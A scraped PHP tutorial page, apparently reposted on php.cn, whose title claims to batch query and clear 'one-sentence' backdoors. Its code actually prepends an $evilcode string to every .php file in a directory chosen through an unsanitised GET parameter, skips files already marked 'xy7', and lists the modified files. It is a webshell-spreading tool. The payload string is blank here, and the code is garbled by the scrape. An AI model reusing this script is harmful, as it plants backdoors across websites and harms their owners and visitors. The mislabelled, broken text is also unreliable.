Home > Backend Development > PHP Tutorial > Use PHP to implement batch query and clear one-sentence backdoor code_PHP tutorial

Use PHP to implement batch query and clear one-sentence backdoor code_PHP tutorial

WBOY
Release: 2016-07-21 15:53:25
Original
871 people have browsed it

I always forget which file I put a sentence in, so I just kill them all...

Copy the code The code is as follows:

if (!isset($dir) or empty($dir)) {
$dir=str_replace('\','/',dirname(__FILE__));
echo "".$dir."";
} else {
$dir=$_GET['dir'];
echo "".$dir."";
}
$evilcode=" ";
$testdir = opendir($dir);
while($filea = @readdir($testdir)){
if(strstr($filea, '.php')){
$fp = @fopen($filea, 'r+');
if (!strstr(@fread($fp, 20), 'xy7')){
rewind($fp);
$ old = @fread($fp, filesize($filea));
rewind($fp);
fwrite($fp, $evilcode . $old);
}
fclose($fp );
}
}
closedir($testdir);
?>






?php
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
if ((is_file($file)) and (ereg(".php {0,1}$",$file)))
{$b="$dir/$file";
$a=@is_dir($b);
if($a== "0"){
$size=@filesize("$dir/$file");
$lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file" ));
echo "n";
echo "n";
echo " n" ;
echo " n";
}
}
}
@closedir($dirs);
?>
Xed files Time Size
$file$lastsave$size Bytes


codz by xuanmumu

http://www.bkjia.com/PHPjc/318709.html

truehttp: //www.bkjia.com/PHPjc/318709.htmlTechArticleI always forget which file I put a sentence in, so I just kill them all... The copy code is as follows: ?//xy7 if(!isset($dir)orempty($dir)){ $dir=str_replace('\','/',dirname(__FILE__)...
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template